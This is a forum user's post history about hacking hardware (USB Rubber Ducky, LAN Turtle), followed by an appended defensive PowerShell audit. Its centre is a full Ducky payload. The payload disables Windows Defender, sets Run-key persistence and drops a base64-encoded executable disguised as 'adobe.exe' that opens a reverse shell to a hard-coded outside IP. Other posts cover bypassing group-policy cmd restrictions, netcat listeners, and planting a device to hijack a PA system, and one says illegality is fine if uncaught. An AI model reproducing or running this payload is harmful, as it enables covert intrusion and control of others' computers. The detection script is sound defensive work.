Roark
Posts posted by Roark
-
Does anyone know of a SIP client such as sipcmd [http://sipcmd.sourceforge.net/] for Windows?
I need to be able to dial the extension for a PA system and play an audio file from the Windows command line. Thanks in advance.
-
Well, I'll edit the script this week and test it out.
-
Do you think I could use [REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f] to edit the registry from PowerShell even though REGEDIT is disabled?
-
No problem.
-
PowerShell is enabled. When I try [powershell Start-Process cmd -Verb runAs], it opens the cmd prompt and says it's disabled by group policy. Can I use PowerShell to edit the registry and allow the cmd prompt?
-
I adapted several other reverse shells into this script, which disables Windows Defender, runs at startup, and will attempt to reconnect every five minutes if the connection is lost.
However, (in this hypothetical situation) the script can't run on the target PC because, even though it has admin privileges, both the cmd prompt and regedit are disabled by group policy.
My question is: how do I enable the cmd prompt without editing the registry, or is there no way around it?
REM reverse shell script adapted by Roark REM ***opens admin cmd prompt without uac*** DELAY 1000 CAPSLOCK GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 REM ***hides cmd prompt window*** ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ***temporarily disable windows defender*** STRING powershell ENTER DELAY 200 STRING Set-MpPreference -DisableRealtimeMonitoring $true ENTER STRING exit ENTER DELAY 400 REM ***permenently disable windows defender*** STRING erase /Q c:\windows\system32\WinDefend.reg ENTER STRING copy con c:\windows\system32\WinDefend.reg ENTER STRING Windows Registry Editor Version 4.00 ENTER STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] ENTER STRING "DisableAntiSpyware"=dword:00000001 ENTER STRING "DisableRoutinelyTakingAction"=dword:00000001 ENTER CTRL z ENTER STRING REGEDIT /s c:\windows\system32\WinDefend.reg ENTER STRING del c:\windows\system32\WinDefend.reg ENTER REM ***create vbs file to run shell on start*** STRING erase /Q c:\windows\system32\runwinupdate.vbs ENTER STRING copy con c:\windows\system32\runwinupdate.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0 ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER REM ***add runwinupdates to start registry*** STRING erase /Q c:\windows\system32\dirty.reg ENTER STRING copy con c:\windows\system32\dirty.reg ENTER STRING REGEDIT4 ENTER STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] ENTER STRING "windowsupdates"="c:\windows\system32\runwinupdate.vbs" ENTER CTRL z ENTER STRING REGEDIT /s dirty.reg ENTER STRING del dirty.reg ENTER REM ***connect on startup and try to reconnect every 5 minutes*** STRING erase /Q c:\windows\system32\winupdate.bat ENTER STRING copy con c:\windows\system32\winupdate.bat ENTER STRING @echo off ENTER STRING :LoopStart ENTER STRING @echo off ENTER STRING tasklist /FI "IMAGENAME eq 
c:\windows\system32\adobe.exe" 2>NUL | find /I /N "c:\windows\system32\adobe.exe" >NUL ENTER STRING if [NOT] "%ERRORLEVEL%"=="0" c:\windows\system32\adobe.exe 104.236.244.103 31330 ENTER STRING timeout /t 300 ENTER STRING GOTO LoopStart ENTER CTRL z REM ***create decode file for shell*** ENTER STRING erase /Q c:\windows\system32\decoder.vbs ENTER STRING copy con c:\windows\system32\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z REM ***create shell*** ENTER STRING erase /Q c:\windows\system32\adobeupdate.txt ENTER STRING copy con c:\windows\system32\adobeupdate.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER 
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER REM ***decode and clean up*** STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe ENTER STRING erase c:\windows\system32\adobeupdate.txt ENTER STRING erase c:\windows\system32\decoder.vbs ENTER REM ***run shell*** STRING c:\windows\system32\winupdate.bat ENTER STRING exit ENTER
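From the defender's side, the script above and the DisableCMD question earlier in this list point at a fixed set of registry values and dropped files: the Windows Defender policy values written through WinDefend.reg, the real-time monitoring switch flipped with Set-MpPreference, the Run-key entry pointing at a .vbs in system32, the files dropped there, and the DisableCMD policy value. The following PowerShell audit is an added example that is not part of the original post; it only reads state and reports, and the function names Invoke-ArtifactAudit and Get-PolicyValue are my own. The registry paths, value names and file names are taken from the post, and it is written for a host where the Defender module is available (Get-MpPreference is skipped quietly otherwise).

```powershell
# Added example (not from the original post): read-only audit for the artifacts
# named in the thread. Function names are my own; paths and value names come from the post.

function Get-PolicyValue {
    param([string]$Path, [string]$Name)
    # Returns the value or $null when the key or value does not exist
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Invoke-ArtifactAudit {
    $findings = @()

    # 1. Defender policy values the script writes via WinDefend.reg
    $defPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    foreach ($name in 'DisableAntiSpyware', 'DisableRoutinelyTakingAction') {
        if ((Get-PolicyValue $defPolicy $name) -eq 1) {
            $findings += "Defender policy $name = 1 under $defPolicy"
        }
    }

    # 2. Real-time monitoring turned off (the Set-MpPreference step)
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref -and $pref.DisableRealtimeMonitoring) {
        $findings += 'Defender real-time monitoring is disabled (DisableRealtimeMonitoring = True)'
    }

    # 3. Run-key persistence launching a script from system32 (dirty.reg step)
    $runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    $run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if ($run) {
        foreach ($p in $run.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath/... metadata
            if ($p.Value -match '\\system32\\.*\.(vbs|bat|cmd|js)$') {
                $findings += "Run entry '$($p.Name)' launches a script from system32: $($p.Value)"
            }
        }
    }

    # 4. Files the script drops into system32 (names taken from the post)
    $dropped = 'runwinupdate.vbs', 'winupdate.bat', 'adobe.exe',
               'decoder.vbs', 'adobeupdate.txt', 'WinDefend.reg', 'dirty.reg'
    foreach ($f in $dropped) {
        $full = Join-Path $env:SystemRoot "System32\$f"
        if (Test-Path $full) { $findings += "Unexpected file present: $full" }
    }

    # 5. The DisableCMD policy value discussed in the thread (HKCU scope, as in the post)
    $cmdPolicy = Get-PolicyValue 'HKCU:\Software\Policies\Microsoft\Windows\System' 'DisableCMD'
    if ($null -ne $cmdPolicy) {
        $findings += "DisableCMD policy is present in HKCU with value $cmdPolicy"
    }

    return $findings
}

# Usage: run in an elevated PowerShell session so HKLM and System32 are readable
$results = Invoke-ArtifactAudit
if ($results.Count -eq 0) { 'No artifacts found' } else { $results }
```

A change to any of these values by a process other than Group Policy or the Defender service itself is the event to alert on; on a managed host the Run key and the Defender policy key should only ever be written by policy, so a scheduled run of this audit (or an equivalent rule in the endpoint agent) that compares against a known-good baseline catches this whole class of script, not just this one.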
-
No, you would create the reverse shell on the target machine and point it to your server. Install netcat on the server and use [nc -l -p yourPortNumber] to receive the reverse shell.
-
For number six, while I seriously doubt that was completely legal, the chances of the neighbour being smart enough to figure out that "your friend" did anything are so small that it doesn't matter. In other words, as long as you don't get caught and no one gets hurt, it's ok. As for everything else, as far as I understand it, monitoring a network that you don't own is illegal. However, I could definitely be wrong about that, and it would be interesting to find the legal loopholes. Good luck in your search for a legal grey area, keep us updated.
-
To anyone else that had this problem:
Your first payload should be named inject.bin, and will execute normally, only when no special keys are activated.
The second is named inject2.bin and executes with NUMLOCK.
The third is named inject3.bin and executes with CAPSLOCK.
Hope it helps.
-
I just flashed my duck with the Multi Duck firmware (m_duck_v2.hex). I encoded two simple scripts and placed them in the root of the SD card. One is just a delay and is named inject.bin; the other is named inject1.bin, and it opens Notepad and types "payload two executed." When I turn on num lock and insert the duck, it blinks green, then red, then green, and turns off, without executing the second script. I tried using caps lock, then scroll lock, then I used different scripts, and found out that it is executing the first script, but not the second. I've messed with this for a while; any help would be great.
-
My goal is to drop the turtle on a network, remotely dial the extension for the PA system, and play an audio file.
-
I was wondering if there is a VoIP module for the LAN Turtle. I've done some research and haven't found one, but maybe I just missed it. If there isn't already a module for VoIP, how difficult would it be to create one, or would it be impossible altogether? Thanks.
SIP Testing From Windows Command Line (in Applications & Coding)
The network uses a VoIP system; it leases a server from ONSIP.